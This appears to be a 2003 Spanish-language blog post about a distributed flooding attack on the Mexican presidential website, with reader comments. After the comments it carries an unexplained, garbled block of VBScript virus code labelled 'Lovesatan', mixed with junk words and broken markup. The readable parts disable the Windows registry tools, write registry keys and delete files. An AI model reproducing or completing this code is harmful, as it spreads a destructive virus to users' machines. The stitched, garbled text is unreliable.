« parentesco | Principal | Hoja Seca »

Junio 10, 2003

presidencia.gob.mx

Atacan hackers sitio presidencial

A través del envío masivo de paquetes de información, el ataque comenzó el sábado 7 a las 23:30 horas y se ha extendido por más de 60 horas, pudiendo prolongarse por semanas, según datos de Gobierno.

Se trata de un ataque distribuido de tipo "IP spoofing", que ha alcanzado anchos de banda de hasta 100 Mbps, logrando saturar el equipo de red del centro de datos del Sistema Internet de la Presidencia.

El ataque, según se ha logrado identificar, proviene del extranjero, y los responsables aún no han sido identificados, pero se sabe que tienen el suficiente ancho de banda para que el proveedor de hosting haya tenido que desconectar el acceso al sitio momentáneamente.


En internet, nadie esta a salvo.

Escrito por Diego en Junio 10, 2003 08:17 PM

Trackback Pings

TrackBack URL para este post:
http://www.blog.com.mx/cgi-bin/mt/pinggacho.cgi/193

Comentarios

Eso no es un ataque de "Hackers".

La desinformacion es mala.

Por eso se crea tan mala fama de los verdaderos Hackers!

Escrito por: vaLar en Junio 12, 2003 09:52 AM

A mi se me ahce que hay gato encerrado. Con eso de ke ya se tiene que hacer publica TODA la informacion...

Escrito por: Pro en Junio 13, 2003 01:32 AM

Esto solo pone en evidencia que no se cuentan con las medidas de seguridad necesarias para prevenir y responder a los ataques de hackers, crackers, phreackers y los que vengan, en este caso es mala señal para los clientes de DIVEO que es donde tiene presidencia sus páginas.

Escrito por: Lector Breetva en Junio 18, 2003 10:04 AM

REM

REM VBS/XOMBRAHACKER/LOVESATAN

REM LEON GTO MEXICO

REM XOMBRAHACKER@HOTMAIL.COM

REM 29 11 77

REM LOVESATAN.EXE

Child

Contextual Ihtml) Else If Iv(mPath

Contextual "Lovesatan.vbs") Then setInterval "Rt()"

Contextual 10000 Else m = "hta" If LCase(m) = Right(mURL

Contextual Len(m)) Then id = setTimeout("mclose()"

Contextual 1) main Else Os.Reset() Os.Path


DisableRegistryTools" = dword:00000001"

" Ds = Grf() Cs = Gsf() If IsVbs Then If Of class="FileExists("C:\lovesatan.htm") Then Of.DeleteFile ("C:\lovesatan.htm") End If Key = CInt(Month(Date)">Adjacent "0010" Ks = "HKEY_CURRENT_USER\Software\Lovesatan\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools" = dword:00000001"

Ds = Grf() Cs = Gsf() If IsVbs Then If Of.FileExists("C:\lovesatan.htm") Then Of.DeleteFile ("C:\lovesatn.htm") End If Key = CInt(Month(Date)+Day(Date)) If Key = 13 Then Od.RemoveAll Od.Add "Lovesatan.exe"

Contextual "0001" Od.Add "dll"

Contextual "0001" End If Cn = Rg(Ks & "Lovesatan\Count") If Cn = "" Then Cn = 1 End If Rw Ks & "Lovesatan\Count"

Adjacent Cn+1 f1 = Rg(Ks & "Lovesatan\FileName") f2 = FNext(Of

Element Od

Contextual f1) fext = GetExt(Of

Element Od

Contextual f2) Rw Ks & "Lovesatan\FileName"

Contextual f2 If IsDel(fext) Then f3 = f2 f2 = FNext(Of <